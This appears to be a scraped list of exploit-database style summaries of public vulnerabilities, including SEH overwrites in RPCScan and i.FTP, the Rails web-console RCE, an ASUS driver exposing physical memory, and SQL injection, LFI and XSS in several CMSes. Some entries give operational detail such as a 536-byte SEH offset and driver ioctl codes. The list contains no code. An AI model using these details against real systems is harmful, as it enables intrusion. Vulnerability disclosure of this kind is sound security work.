A buffer overflow vulnerability exists in Windows Media Player MediaInfo v0.7.61 when a specially crafted MP3 file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user.
This module exploits a remote code execution feature of the Ruby on Rails framework. This feature is exposed if the config.web_console.whitelisted_ips setting includes untrusted IP ranges and the web-console gem is enabled.
RPCScan v2.03 is vulnerable to a SEH Overwrite vulnerability. By supplying a malicious payload in the Hostname/IP field, an attacker can overwrite the SEH frame and execute arbitrary code. The offset to the SEH frame is 536 bytes and the address of the next SEH frame and the address of the handler code are both 4 bytes long.
Credits go to koczkatama for coding a PoC, however if you run this exploit from shell connection, not a remote desktop, the result will be getting the privileged shell in new GUI windows. PoC: Download the source code (C#) also there will be compiled version as well, copy the dll file and the executable to the target machine, run it to get SYSTEM.
The ASUS "Generic Function Service" includes a couple of drivers, ASMMAP.sys / ASMMAP64.sys, the version resources describe them as "Memory mapping Driver". This description is very accurate, it has a pair of ioctls, 0x9C402580 and 0x9C402584, that map or unmap to the calling process' address space ANY PART OF PHYSICAL MEMORY, with READ/WRITE permissions. This PoC can dump a block of physical memory to disk, and write to a block of physical memory from a file.
ZeewaysCMS suffers from a file inclusion vulnerability (LFI) when encoded input passed thru the 'targeturl' GET parameter is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes. Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
This exploits an pre-auth SQL Injection in the login.php script within an update statement to steal session data. It then exploits a second post-auth SQL Injection vulnerability that writes a shell to the target using a relative path and gets SYSTEM.
i.FTP 2.21 is vulnerable to a SEH exploit. An attacker can connect to the application and paste malicious content into the Host Address / URL field. This will cause a buffer overflow and allow the attacker to execute arbitrary code.
Ajaxel CMS version 8.0 and below suffers from multiple vulnerabilities inlcuding LFI, XSS, SQL injection and remote code execution via CSRF. Reflected XSS can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. SQL injection can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. Local File Disclosure can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. Cross-Site Request Forgery - RCE PoC can be exploited by sending a maliciously crafted HTML form to the vulnerable server.
Some scripts were accessible without authentication, which allowed public access to sensitive data such as licensing information and Monitored Server Details like name IP and maintenance schedule. The downTimeScheduler.do script is vulnerable to a Boolean based blind, and Union based SQL injection, that allows complete unauthorized access to the back-end database, according to the level of privileges of the application database user.
Services By CQR